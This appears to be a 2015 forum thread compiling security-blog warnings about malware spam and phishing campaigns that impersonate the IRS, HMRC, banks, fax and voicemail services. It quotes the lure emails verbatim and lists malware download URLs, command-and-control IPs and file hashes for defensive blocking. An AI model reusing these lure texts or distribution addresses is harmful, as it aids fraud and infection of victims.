- http://blog.dynamoo.com/2015/01/this-rather-terse-spam-comes-with.html
20 Jan 2015
1] https://www.virustotal.com/en/file/3cf6a0c90dad3b16422ed543195abf09a70b660c15fbab956eba1855024fcfbb/analysis/1421745692/

2] https://www.virustotal.com/en/file/f76bdf44089a2f81115e5f6b933b1c9966b7fb358b80c0cf532a72acf9fe46d0/analysis/1421746148/
___

Fake 'Undefined transactions' SPAM - macro malware
- http://blog.dynamoo.com/2015/01/malware-spam-undefined-transactions.html
20 Jan 2015 - "This spam comes in a few different variants, however the body text always seems to be the same:
From: Joyce Mills
Date: 20 January 2015 at 10:30
Subject: Undefined transactions (need assistance) Ref:1647827ZM
Good morning
I have recently found several payments on statement with the incorrect reference. Amounts appear to be from your company, could you please confirm these payments are yours and were made from your company's bank account. If no then please reply me as soon as possible. Thanks.
P.S. Undefined transactions are included in the attached DOC.
Regards,
Joyce Mills
Senior Accounts Payable
PAYPOINT

The reference number is randomly generated and changes in each case; attached is a malicious Word document also containing the same reference number (e.g. 1647827ZM.doc). Also the name in the "From" field is consistent with the name on the bottom of the email, although this too seems randomly generated... I have seen two different variants of Word document in circulation, both undetected by AV vendors [1] [2] and each one contains a slightly different malicious macro... which attempt to download from the following locations:
http ://189.79.63.16 :8080/koh/mui.php
http ://203.155.18.87 :8080/koh/mui.php
This file is downloaded as 20.exe and is then copied to %TEMP%\324234234.exe. It has a VirusTotal detection rate of 2/57*. That report indicates that it attempts to phone home to:
194.146.136.1 (PE "Filipets Igor Victorovych", Ukraine)
This IP is commonly used in this type of attack; I would strongly recommend you block it. The Malwr report shows that this drops a Dridex DLL with a VirusTotal detection rate of 2/57**, which is the same DLL as seen earlier today***."
1] https://www.virustotal.com/en/file/5d2500d1e1776adffe161bae934af1e52389d6134a3d14ce8d638fb6d6185fd2/analysis/1421750540/

2] https://www.virustotal.com/en/file/9f2eea012d0370b0a8051255e53bfd386b7bec32e92ea6a51e29b68b83739765/analysis/1421750559/

* https://www.virustotal.com/en/file/b6d46cfd60db1e9edef1077d908f075f3dc4ca2b0161f40ca02e0b50d468809a/analysis/1421750847/

** https://www.virustotal.com/en/file/447628439e2e53806ff3c6e76d3ececea50ab5607b3ace9c75fd2248aaad0a09/analysis/1421752892/

*** http://blog.dynamoo.com/2015/01/malware-spam-monika-monikagoetzbigkcouk.html


- http://myonlinesecurity.co.uk/undefined-transactions-need-assistance-ref50236lv-word-doc-malware/
20 Jan 2015
* https://www.virustotal.com/en/file/9f2eea012d0370b0a8051255e53bfd386b7bec32e92ea6a51e29b68b83739765/analysis/1421749886/
___

Fake 'IRS' SPAM - doc malware
- http://myonlinesecurity.co.uk/internal-revenue-service-complaint-company-word-doc-malware/
20 Jan 2015 - "'Complaint against your company' pretending to come from Internal Revenue Service <complaints@irs.gov> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer... The email looks like:
Dear business owner,
A criminal complaint has been filled against your company.
Your company is being accused of trying to commit tax evasion schemes.
The full text of the complaint file ( .DOC type ) can be viewed in your
Microsoft Word, complaint is attached.
AN official response from your part is required, in order to take further
action.
Please review the charges brought forward in the complaint file, and
contact us as soon as possible by :
Telephone Assistance for Businesses: Toll-Free, 1-800-829-4933
Email: complaints@ irs .gov
Thank you,
Internal Revenue Service Fraud Prevention Department

20 January 2015 : complaint20150119.doc - Current Virus total detections: 22/57*
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/d04079c569863276bf4a135096b68fbafc6bb2679ac10b41b4af40f30d6fbb12/analysis/1421772306/
___

Fake 'Bank of Canada' SPAM – PDF malware
- http://myonlinesecurity.co.uk/national-bank-canada-notice-payment-fake-pdf-malware/
20 Jan 2015 - "'National Bank of Canada Notice of payment' pretending to come from sac.sbi@ sibn .bnc .ca with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You can view and print the notice of payment using the Netscape or
Microsoft Explorer browsers, versions 6.2 and 5.5. You can export and store the
notice of payment data in your spreadsheet by choosing the attached file in
pdf format “.pdf”.
If you have received this document by mistake, please advise us immediately
and return it to us at the following E-mail address:
“sac.sbi@ sibn .bnc .ca”.
Thank you.
National Bank of Canada
600 de La Gauchetire West, 13th Floor
Montreal, Quebec H3B 4L2 ...

20 January 2015: payment_notice.zip: Extracts to: payment_notice.scr
Current Virus total detections: 13/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/1c6bf03d178cc1c5dd101e3bcd5fdf8f56bd2c1e8217e3713ffe6a861b1d33b6/analysis/1421783533/

:fear: :mad:

AplusWebMaster
2015-01-21, 15:23
FYI...

Fake 'Open24 Service update' Phish ...
- http://myonlinesecurity.co.uk/open24-permanent-tsb-service-update-phishing/
21 Jan 2015 - "'Open24 Permanent TSB Service update' pretending to come from Open24 <serviceupdates@ gol .net .gy> is one of the latest -phish- attempts to steal your Open24.ie ( Permanent TSB) Bank, credit card and personal details. This one only wants your personal details, your credit card and bank details... -don’t- click-the-link in the email. If you do it will lead you to a website that looks at first glance like the genuine bank website but you can clearly see in the address bar, that it is fake. Some versions of this phish will ask you to fill in the html (webpage) form that comes attached to the email:
Fwd: Software Upgrade
Dear Open24 Customer,
In order to help us protect our main line of defense against intruders; you will need to update your account through our secured server, in line to safe internet banking regulatory Requirements.
To proceed, simply follow the link below:
service_update
Kind regards
Open24

> Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/open24_phish1.png
When you fill in your user name and password you get sent on to a page looking like this, where the phishers try to validate your details to make sure that you are entering “genuine” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format then you are sent to the genuine open24.ie ( permanent TSB ) bank site:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/open24_phish2-1024x659.png
All of these emails use Social engineering tricks to persuade you to open the attachments (or click-the-link) that come with the email..."
___

Fake inTuit QuickBooks Phish
- https://security.intuit.com/alert.php?a=119
1/19/2015 - "People are receiving -fake- emails with the title "Profile Update". These mails are coming from turbotax_infoo01@ grr .la, which is -not- a legitimate email address. Below is a copy of the email people are receiving:
> https://security.intuit.com/images/profileupdatephish.jpg

This is the end of the -fake- email.
Steps to Take Now:
- Do -not- open the attachment in the email...
- Do not forward the email to anyone else.
- Delete the email."
___

Flash 0-Day Exploit used by Angler Exploit Kit
- https://isc.sans.edu/diary.html?storyid=19213
2015-01-21 - "The "Angler" exploit kit is a tool frequently used in drive-by download attacks to probe the browser for different vulnerabilities, and then exploit them to install malware. The exploit kit is very flexible and new exploits are added to it constantly. However, the blog post below* shows how this exploit kit is currently using an unpatched Flash 0-day to install malware. Current versions of Windows (e.g. Windows 8 + IE 10) appear to be vulnerable. Windows 8.1, or Google Chrome do not appear to be vulnerable... typically we see these exploits more in targeted attacks, not in widely used exploit kits. This flaw could affect a large number of users very quickly..."
* http://malware.dontneedcoffee.com/2015/01/unpatched-vulnerability-0day-in-flash.html
2015-01-21 - "... Angler EK exploiting last version (16.0.0.257) of Flash..."
Update: "... tested it against the free version of Malwarebytes Anti Exploit* (a product from one of my customers). That stopped it. Well done!..."
* https://www.malwarebytes.org/antiexploit/

- http://blog.trendmicro.com/trendlabs-security-intelligence/flash-greets-2015-with-new-zero-day/
Jan 22, 2015 - "... Chrome’s version of the Flash Player plugin is sandboxed, mitigating potential effects to end users. Firefox is also immune to this threat..."
Geographic distribution of users affected by Angler
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/01/Geographic-Distribution-of-Users-Affected-by-Angler-01.jpg

:fear: :mad:

AplusWebMaster
2015-01-22, 16:12
FYI...

Fake 'HMRC Application' SPAM – PDF malware
- http://myonlinesecurity.co.uk/hmrc-application-fake-pdf-malware-2/
22 Jan 2015 - "'HMRC Application – [ your domain name]' pretending to come from HMRC .gov .uk <application@ hmrc .gov .uk> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This template was used in a malware run back in July 2014 and gets periodically reused HMRC Application – fake PDF malware*...
* http://myonlinesecurity.co.uk/hmrc-application-fake-pdf-malware/
The email looks like:
Please print this information, sign and send to application@ hmrc .gov .uk.
Date Created: 22 January 2015
Business name: ...
Acknowledgement reference: 3213476
VAT Registration Number is 3213476.
Repayment of Input Tax
Before the business starts to make taxable supplies they may provisionally claim repayment of VAT they are charged as input tax. The general rules about VAT, including Input Tax, Partial Exemption, are explained in VAT Notices 700 and 706, available on the HMRC website
Repayment of VAT as input tax is subject to the condition, provided for by the Value Added Tax Act 1994, Section 25(6), that HMRC may require them to refund some or all of the input tax they have claimed, if they do not make taxable supplies by way of business, or the input tax they claimed prior to a period in which they make taxable supplies in the course of business does not relate to the taxable supplies they make.
Change of Circumstances
If your client no longer intends to make taxable supplies, or there is any other change of circumstances affecting their VAT registration (including any delay in starting to make taxable supplies), they must notify HMRC within 30 days of the change.
If the application included an enquiry about:
the Flat Rate Scheme
the Annual Accounting Scheme
an Economic Operator Registration and Identification (EORI) number
HMRC will send your client more information about this separately
What next?
Your client will receive their Certificate of Registration (VAT4) in the post in due course.
Your client can find general information about VAT and a guide to record keeping requirements by following one of the links below...

22 January 2015: Application_3213476.zip (15 kb): Extracts to: Application_891724.pdf.exe
Current Virus total detections: 2/56** . This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
** https://www.virustotal.com/en/file/a38511049249886b981a5a6221008a867e5199b5961106a3cec29badd523dd94/analysis/1421924288/
___

Fake 'Tesco Bank Fix' – Phish ...
- http://myonlinesecurity.co.uk/tesco-bank-fix-error-account-phishing/
22 Jan 2015 - "'Tesco Bank Fix The Error On Your Account' pretending to come from Tesco .com <info@ thf .com> warning of errors on your account is one of the latest phish attempts to steal your Tesco bank Account and your other personal details. This one wants your personal details, Tesco log in details and your credit card and bank details... -don’t- click-the-link in the email. If you do it will lead you to a website that looks at first glance like the genuine Tesco bank website but you can clearly see in the address bar, that it is fake. Some versions of this phish will ask you to fill in the html (webpage) form that comes attached to the email:
Dear Customer:
You have an incoming payment slated for your account. This transaction cannot be
completed due to errors present in your account information.
You are required to click on the Logon below to fix this problem immediately.
LOG ON
Please do not reply to this message. For questions, please call Customer Service at the
number on the back of your card. We are available 24 hours a day, 7 days a week.
Regards,
Tesco Personal Finance.

If you follow the link you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers1-1024x606.jpg
Then you get a page asking for password and Security number:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers2.jpg
After you fill in your Security number and password you get a page looking like this, where the phishers try to validate your details to make sure that you are entering “genuine” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers3.jpg
Then they send you to this page and eventually it auto redirects you to the genuine Tesco bank site:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers4.jpg
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
___

Fake (more) MyFax malware SPAM
- http://blog.dynamoo.com/2015/01/yet-more-myfax-malware-spam.html
22 Jan 2015 - "There's another batch of "MyFax" spam going around at the moment, for example:
From: MyFax [no-replay@ my-fax .com]
Date: 22 January 2015 at 15:08
Subject: Fax #4356342
Fax message
http ://[redacted]/.-NEW_RECEIVED.FAX/fax.html
Sent date: Thu, 22 Jan 2015 15:08:30 +0000

Clicking the link [don't] leads to a page like this:
> http://1.bp.blogspot.com/-k2m-UrYJxyA/VMEkOU_xYXI/AAAAAAAAGKc/POCVv8uPOwg/s1600/upatre.png
The download leads to an EXE-in-ZIP download which is a little different every time [1] [2] [3] [virustotal]. Detection rates are around 6/55.
The Malwr report shows communication with the following URLs:
http ://202.153.35.133 :51025/2201us22/HOME/0/51-SP3/0/
http ://202.153.35.133 :51025/2201us22/HOME/1/0/0/
http ://when-to-change-oil .com/mandoc/story_su22.pdf
http ://202.153.35.133 :51014/2201us22/HOME/41/7/4/
Of these 202.153.35.133 is the essential one to -block- traffic to, belonging to Excell Media Pvt Ltd in India. A file axybT95.exe is also dropped according to the report, which has a detection rate of 7/48*.
I haven't seen a huge number of these; the format of the URLs looks something like this:
http ://[redacted]/.-NEW_RECEIVED.FAX/fax.html
http ://[redacted]/NEW_FAX-MESSAGES/fax.letter.html
http ://[redacted]/_~NEW.FAX.MESSAGES/incoming.html "
1] https://www.virustotal.com/en/file/eaedc6884264fd9e5afd6ebc754bc7ad1ff6e5670e49536bcf5b949864515617/analysis/1421943275/

2] https://www.virustotal.com/en/file/ddaf8767671337047a98934b34c1f90f17078516887cbb4116355295ac670adb/analysis/1421943304/

3] https://www.virustotal.com/en/file/3d99b919a29563e3cf86e2577c85202127c3f4372538d0d3d0830f9199a39d32/analysis/1421943319/

* https://www.virustotal.com/en/file/7cea9e6d5c8a1484f3928ad2e946471799872e07ef70cb8ee0ea16d1ab502d40/analysis/1421944232/

- http://myonlinesecurity.co.uk/myfax-fax-5717718-fake-pdf-malware/
22 Jan 2015
* https://www.virustotal.com/en/file/b7ddbecb37df4b1aef2de5f8defaa44ad41ef534714310ab33a9ecc74e504681/analysis/1421940393/
___

Fake 'voice mail' SPAM – PDF malware
- http://myonlinesecurity.co.uk/received-voice-mail-fake-pdf-malware/
22 Jan 2015 - "'You have received a voice mail' pretending to come from Voice Mail <no-reply@ voicemail-delivery .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You received a voice mail : VOICE 837-676-8958.wav (29 KB)
Caller-Id: 837-676-8958
Message-Id: KIUB4Y
Email-Id: [redacted]
This e-mail contains a voice message.
Download and extract the attachment to listen the message.
Sent by Microsoft Exchange Server

22 January 2015 : VOICE837-676-8958.zip (209 kb): Extracts to: VOICE8419-283-481.scr
Current Virus total detections: 1/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e855d451a62df108cd81c8bc350d24c60cad32981db4d8df08937804be5ddde0/analysis/1421943742/
0003_.b64.zip-1.exe

:fear: :mad:

AplusWebMaster
2015-01-23, 15:17
FYI...

Fake 'tax return incorrect' SPAM - doc malware
- http://blog.dynamoo.com/2015/01/malware-spam-2014-tax-payment-issue.html
23 Jan 2015 - "This tax-themed spam has a malicious Word document attached. It appears to come in several variants, for example:
From: Quinton
Date: 23 January 2015 at 08:18
Subject: 2014 Tax payment issue
According to your tax payments for 2014 year period we found that you gave a wrong legal address in your last tax payment. In order to avoid penalty fees on your tax dues we ask you to contact our specialist having checked the previous payment in advance (the DOC invoice attached below).
Regards
Quinton
Tax Inspector

From: Tara Morris
Date: 23 January 2015 at 09:28
Subject: Your tax return was incorrectly filled out
Attention: Accountant
This is to inform you that your legal address was filled incorrectly while completing the last tax form application for 2014 year.
In order to avoid penalty fees during the next tax period please contact our expert as soon as you check the payment details (the DOC invoice attached below).

Attached is a Word document with a random name, but always starting with "TAX_". Examples include:
TAX_42592OE.doc
TAX_381694AI.doc
TAX_59582FZ.doc
There are two different variants of this Word document that I have seen so far, neither are detected by AV vendors [1] [2] containing one of two malicious macros... that download a file 20.exe from the following URLs:
http ://37.139.47.221 :8080/koh/mui.php
http ://95.163.121.82 :8080/koh/mui.php
This file is then saved to %TEMP%\GYHjksdf.exe and has a low detection rate of 2/56 (Norman AV identifies it as Dridex). The Malwr analysis is inconclusive, other analysis is pending."
1] https://www.virustotal.com/en/file/5d93d9f0368d6b0ff5881864b7c9792bdde482f8b79d6ade44d6c878f58897c4/analysis/1422005666/

2] https://www.virustotal.com/en/file/c3e9b61d47ea0337c391686aedb5b6654c3ae38043b0a34414a5cd3cc069bf62/analysis/1422005678/

37.139.47.221: https://www.virustotal.com/en/ip-address/37.139.47.221/information/

95.163.121.82: https://www.virustotal.com/en/ip-address/95.163.121.82/information/


- http://myonlinesecurity.co.uk/tax-return-incorrectly-filled-word-doc-malware/
23 Jan 2015
> https://www.virustotal.com/en/file/c3e9b61d47ea0337c391686aedb5b6654c3ae38043b0a34414a5cd3cc069bf62/analysis/1422004558/
TAX_38156WHH.doc
> https://www.virustotal.com/en/file/3d1acc20c90088cf164863343dd3bca558a45bb0e386923e26b88ed571e991e8/analysis/1422007893/
23.01.15_3406ICZ.xls
___

Fake 'Danske Bank' SPAM – PDF malware
- http://myonlinesecurity.co.uk/danske-bank-potentially-fraudulent-transaction-fake-pdf-malware-2/
23 Jan 2015 - "'Danske Bank – Potentially fraudulent transaction' pretending to come from Dee Hicks – Danske Bank <Dee.Hicks@ danskebank .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
We are contacting you regarding a potentially fraudulent transaction on your account.
Please check attached file for more information about this specific transaction.
Dee Hicks
Senior Account Executive
Danske Bank
Dee.Hicks@ danskebank .com
Tel. +45 33 44 46 77
CONFIDENTIAL NOTICE: The contents of this message, including any attachments, are confidential and are intended solely for the use of the person or entity to whom the message was addressed...

23 January 2015 : bank_notice2301.zip (12kb): Extracts to: bank_notice2301.scr
Current Virus total detections: 8/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d1d6bcb1e318abc7f8bb92d4eb3da9dd78843fa9bf456ceed0cf7bd666387104/analysis/1422012240/
___

Fake 'IRS Activity' SPAM - malware
- http://blog.dynamoo.com/2015/01/malware-spam-irs-fiscal-activity-531065.html
23 Jan 2015 - "This fake IRS spam actually does use the irsuk .co domain to host malware.
From: IRS [support@ irsuk .co]
Date: 23 January 2015 at 11:46
Subject: IRS Fiscal Activity 531065
Hello, [redacted].
We notify you that last year, according to the estimates of tax taxation,
we had a shortage of means.
We ask you to install the special program with new digital certificates,
what to eliminate an error.
To install the program go to the link <redacted>
Thanks
Intrenal Revenue Sevrice...

The ZIP file contains a malicious executable SetupIRS2015.exe which has a VirusTotal detection rate of 8/53*. The irsuk .co site is hosted on 89.108.88.9 (Agava Ltd, Russia). The Malwr report shows it phoning home to garbux .com (78.24.219.6 - TheFirst-RU, Russia)... A look at 89.108.88.9 shows there is only one active website on that IP address (irsuk .co), but the host on the IP identifies itself as ukirsgov .com which is a domain created on the same day (2015-01-19) but has been -suspended- due to invalid WHOIS details (somebody at csc .com), which was hosted on a Bosnian IP of 109.105.193.99 (Team Consulting d.o.o.). That IP is identified as malicious by VirusTotal with a number of bad domains and binaries**. The malware POSTS to garbux .com which Sophos identifies as a characteristic of the generically-named Troj/Agent-ALHF. Overall, automated analysis tools are not very clear about what this malware does... although you can guarantee it is nothing good.
Recommended blocklist: [list omitted] "
* https://www.virustotal.com/en/file/8dd29cf89a00689ce7221f8b4ab7873784c91555773ad90e509bdf90a68c019d/analysis/1422014166/

** 109.105.193.99: https://www.virustotal.com/en/ip-address/109.105.193.99/information/
___

Fake AMEX SPAM - PDF malware
- http://myonlinesecurity.co.uk/american-express-message-ready-fake-pdf-malware/
23 Jan 2015 - "'Your Message is Ready' pretending to come from American Express <secure.message@ americanexpresss .com> is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and download the malware zip...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/Amex-your-message-is-ready.png

When you follow the link you get a page saying "Get file. Your download will start in 5 seconds..." ... which then counts down to zero. You might get the -malware- automatically downloaded or you might have to click-the-direct-link [don't].
23 January 2015: bankline_document_pdf57331.zip (12 kb): Extracts to: bankline_document_pdf34929.exe
Current Virus total detections: 4/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/62a3f1d161c9a52c6283b2e426a1289b160f943b32f337877843bc37100564cc/analysis/1422025963/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
192.163.217.66: https://www.virustotal.com/en/ip-address/192.163.217.66/information/
___

Fake 'BankLine secure message' SPAM - malware
- http://blog.dynamoo.com/2015/01/malware-spam-you-have-received-new.html
23 Jan 2015 - "... these RBS BankLine spam messages are a popular mechanism for the bad guys to spread malware.
From: Bankline [secure.message@ rbs .com .uk]
Date: 23 January 2015 at 12:43
Subject: You have received a new secure message from BankLine
You have received a secure message.
Read your secure message by following the link bellow:
<redacted>
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly...

The link in the email seems to be somewhat dynamic... The landing page looks like this:
> http://4.bp.blogspot.com/-LLqihSXhTvU/VMJVxFvr-PI/AAAAAAAAGKw/rEq-NZnPuJo/s1600/fake-rbs.jpg
The link on that landing page goes to http ://animation-1 .com/js/jquery-1.41.15.js?get_message which downloads a ZIP file called Bankline_document_pdf71274.zip (or something similar) containing an executable file named something like Bankline_document_pdf24372.exe. The numbers change in each case, and indeed the executable changes slightly every time it is downloaded. The ThreatExpert report shows that it attempts to communicate with the well-known-bad-IP of 202.153.35.133 (Excell Media Pvt Ltd, India) which is associated with the Dyre banking trojan."

202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/

:fear: :mad:

AplusWebMaster
2015-01-26, 16:49
FYI...

Fake 'HP Scanned Image' SPAM - malware
- http://blog.dynamoo.com/2015/01/malware-spam-hp-digital-device-scanned.html
26 Jan 2015 - "This spam comes with a malicious attachment:
From: HP Digital Device [HP_Printer@ victimdomain .com]
Date: 26 January 2015 at 13:04
Subject: Scanned Image
Please open the attached document.
This document was digitally sent to you using an HP Digital Sending device...
This email has been scanned for viruses and spam...

Attached is a file ScannedImage.zip which contains a malicious executable ScannedImage.scr which has a VirusTotal detection rate of 5/56*..."
* https://www.virustotal.com/en/file/022106d84bc29aa99d5730d5be1dfcd4d03e28ebd9f6a8965c7efab258494cbd/analysis/1422279206/

- http://myonlinesecurity.co.uk/scanned-image-fake-pdf-malware/
26 Jan 2015
> https://www.virustotal.com/en/file/022106d84bc29aa99d5730d5be1dfcd4d03e28ebd9f6a8965c7efab258494cbd/analysis/1422279206/
___

Fake 'Berendsen Invoice' SPAM – doc malware
- http://myonlinesecurity.co.uk/berendsen-uk-ltd-invoice-60020918-117-word-doc-malware/
26 Jan 2015 - "'Berendsen UK Ltd Invoice 60020918 117' pretending to come from donotreply@berendsen.co.uk with -a malicious word doc attachment- is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Dear Sir/Madam, Please find attached your invoice dated 1st January. All queries should be directed to your branch that provides the service. This detail can be found on your invoice. Thank you...

26 January 2015: IRN001526_60020918_I_01_01.DOC (39 kb)
Current Virus total detections: 0/55* | IRN001526_60020918_I_01_01.DOC (34kb) 0/56**
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/17b2a838cf97a51a957b4fdac872da5275099eafe51d9ef36e4ccd0807863cd6/analysis/1422258625/

** https://www.virustotal.com/en/file/0425efe9926a2224ab2116142b769e924252320194a347f52d0800c6005caeec/analysis/1422258320/

- http://blog.dynamoo.com/2015/01/malware-spam-berendsen-uk-ltd-invoice.html
26 Jan 2015
> https://www.virustotal.com/en/file/f0b5ff9d89abfff25e71cc6b917d3c91d72a118d2b31174564b6e026da6b9846/analysis/1422262884/

- http://blog.mxlab.eu/2015/01/26/email-berendsen-uk-ltd-invoice-60020918-117-contains-malicious-word-attachment/
Jan 26, 2015
> https://www.virustotal.com/en/file/f0b5ff9d89abfff25e71cc6b917d3c91d72a118d2b31174564b6e026da6b9846/analysis/1422262884/
___

Fake 'CardsOnLine natwesti' SPAM
- http://blog.dynamoo.com/2015/01/malware-spam-cardsonlinenatwesticom.html
26 Jan 2015 - "This -fake- NatWest email leads to malware:
From: CardsOnLine [CardsOnLine@ natwesti .com]
Date: 26 January 2015 at 13:06
Subject: Cards OnLine E-Statement E-Mail Notification
Body:
Dear Customer
Your July 30, 2014 E-Statement for account number xxxxxxxxxxxx6956 from Cards OnLine is now available.
For more information please check link: <redacted>
Thank you
Cards OnLine

... Users have recently been targeted through -bogus- E-Mails by fraudsters claiming to be from their bank. These E-Mails ask customers to provide their internet banking security details in order to reactivate their account or verify an E-Mail address. Please be on your guard against E-Mails that request any of your security details... Users who click-the-link see a download page similar to this:
> https://4.bp.blogspot.com/-a7BgUdoOpJM/VMZTVvYZRHI/AAAAAAAAGLE/f3cZqKKwrpA/s1600/natwest-download.png
The link in the email downloads a randomly-named file in the format security_notice55838.zip which contains a malicious binary which will have a name similar to security_notice18074.exe. This binary has a VirusTotal detection rate of 1/56* and is identified by Norman AV as Upatre..."
* https://www.virustotal.com/en/file/87c96a40af60b3f4d99bf6c2c261a4cdcfce6c46b682c49acce4ca424190aa2c/analysis/1422281915/
___

Fake 'Sage Invoice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/sage-re-invoice-9836956-fake-pdf-malware/
26 Jan 2015 - "'RE: Invoice #9836956' pretending to come from Sage .co .uk <no-reply@ sage .co .uk> [random invoice numbers] with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please remit BACs before 26/01/2015. The document attached.

The malware attached to this email is exactly the same as in today’s Scanned Image – fake PDF malware*.
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/scanned-image-fake-pdf-malware/

:fear: :mad:

AplusWebMaster
2015-01-27, 17:38
FYI...

Whatsapp leads to Fake Flash update – malware
- http://myonlinesecurity.co.uk/whatsapp-notification-leading-fake-flashplayer-update-malware/
27 Jan 2015 - "An email pretending to come from somebody you know that appears to be a Whatsapp notification is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/whatsapp_flash_update1-262x300.png

When you press the play button in the email, you get sent to a page looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/whatsapp_flash_update2-1024x739.png
... if you select the 'upgrade now' button you end up with a fake flash player update and a badly infected computer...
27 January 2015: adobe_flash_player_update.exe . Current Virus total detections: 2/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/78ddffc79c02331fd229c563e0a442bb018716f6d86bbf96c41518daa64a2ac6/analysis/1422376705/
___

Fake 'invoice' SPAM - malware
- http://blog.dynamoo.com/2015/01/malware-spam-eileen-meade-r-kern.html
27 Jan 2015 - "Kern Engineering & Mfg Corp. is a wholly legitimate firm, they are not sending out this spam nor have their systems been compromised in any way. Instead, this is a -forgery- which has a malicious Word document attached.
From: Eileen Meade [eileenmeade@ kerneng .com]
date: 27 January 2015 at 08:25
subject: inv.# 35261
Here is your invoice & Credit Card Receipt.
Eileen Meade
R. Kern Engineering & Mfg Corp.
Accounting
909) 664-2442
Fax 909) 664-2116

So far, I have seen two different versions of the Word document, both poorly detected [1] [2] containing two different macros... These attempt to download a binary from one of the following locations:
http ://UKR-TECHTRAININGDOMAIN .COM/js/bin.exe
http ://schreinerei-ismer.homepage.t-online .de/js/bin.exe
This is saved as %TEMP%\sdfsdferfwe.exe. It has a VirusTotal detection rate of 3/57*..."
1] https://www.virustotal.com/en/file/7eee6bc6e3f310ffac3dc043b6d17ae7b0001693737a0fe1fc124eeb7695622d/analysis/1422351101/

2] https://www.virustotal.com/en/file/2ee6e22de91581fe5dd93407be7207f746c3c6ae52264065c3a344d61e4d0f2d/analysis/1422351116/

* https://www.virustotal.com/en/file/23bbf7b1407bb9e657160f0545facc1d2634d5ba55d67bfaef3685194aa66ec1/analysis/1422351532/


- http://myonlinesecurity.co.uk/eileen-meade-kern-engineering-inv-87049-word-doc-malware/
27 Jan 2015
> https://www.virustotal.com/en/file/7eee6bc6e3f310ffac3dc043b6d17ae7b0001693737a0fe1fc124eeb7695622d/analysis/1422350612/

> https://www.virustotal.com/en/file/2ee6e22de91581fe5dd93407be7207f746c3c6ae52264065c3a344d61e4d0f2d/analysis/1422350713/

- http://blog.mxlab.eu/2015/01/27/fake-email-from-r-kern-engineering-inv-57949-contains-malicious-word-document/
